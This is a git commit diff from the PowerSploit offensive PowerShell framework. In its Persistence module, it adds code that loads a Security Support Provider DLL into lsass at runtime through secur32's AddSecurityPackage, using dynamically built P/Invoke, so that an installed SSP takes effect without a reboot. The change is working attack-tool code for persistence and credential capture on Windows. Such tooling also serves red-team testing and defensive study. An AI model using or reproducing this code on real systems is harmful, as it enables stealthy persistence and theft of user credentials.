diff options
| author | mattifestation <mattgraeber@gmail.com> | 2014-10-01 23:17:50 -0400 |
|---|---|---|
| committer | mattifestation <mattgraeber@gmail.com> | 2014-10-01 23:17:56 -0400 |
| commit | 97034006f63f2691cde8ddb1055b1253c6f93cce (patch) | |
| tree | f1f5120bad7f59c45885c554fa8d3354c1bc140d /Persistence | |
| parent | 4daac216c881d6e6750a2b3daadf77266ab1eb83 (diff) | |
| download | PowerSploit-97034006f63f2691cde8ddb1055b1253c6f93cce.tar.gz PowerSploit-97034006f63f2691cde8ddb1055b1253c6f93cce.zip | |
Loading of an SSP no longer requires a reboot.
Diffstat (limited to 'Persistence')
| -rw-r--r-- | Persistence/Persistence.psm1 | 42 |
1 files changed, 41 insertions, 1 deletions
diff --git a/Persistence/Persistence.psm1 b/Persistence/Persistence.psm1 index 3666c59..344c13d 100644 --- a/Persistence/Persistence.psm1 +++ b/Persistence/Persistence.psm1 @@ -857,7 +857,47 @@ into lsass, the dll must export SpLsaModeInitialize. Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name 'Security Packages' -Value $SecurityPackages - Write-Verbose 'Installation complete! Reboot for changes to take effect.' + $DynAssembly = New-Object System.Reflection.AssemblyName('SSPI2') + $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run) + $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('SSPI2', $False) + + $TypeBuilder = $ModuleBuilder.DefineType('SSPI2.Secur32', 'Public, Class') + $PInvokeMethod = $TypeBuilder.DefinePInvokeMethod('AddSecurityPackage', + 'secur32.dll', + 'Public, Static', + [Reflection.CallingConventions]::Standard, + [Int32], + [Type[]] @([String], [IntPtr]), + [Runtime.InteropServices.CallingConvention]::Winapi, + [Runtime.InteropServices.CharSet]::Auto) + + $Secur32 = $TypeBuilder.CreateType() + + if ([IntPtr]::Size -eq 4) { + $StructSize = 20 + } else { + $StructSize = 24 + } + + $StructPtr = [Runtime.InteropServices.Marshal]::AllocHGlobal($StructSize) + [Runtime.InteropServices.Marshal]::WriteInt32($StructPtr, $StructSize) + + $RuntimeSuccess = $True + + try { + $Result = $Secur32::AddSecurityPackage($DllName, $StructPtr) + } catch { + $HResult = $Error[0].Exception.InnerException.HResult + Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))" + Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)" + $RuntimeSuccess = $False + } + + if ($RuntimeSuccess) { + Write-Verbose 'Installation and loading complete!' + } else { + Write-Verbose 'Installation complete! Reboot for changes to take effect.' + } } function Get-SecurityPackages |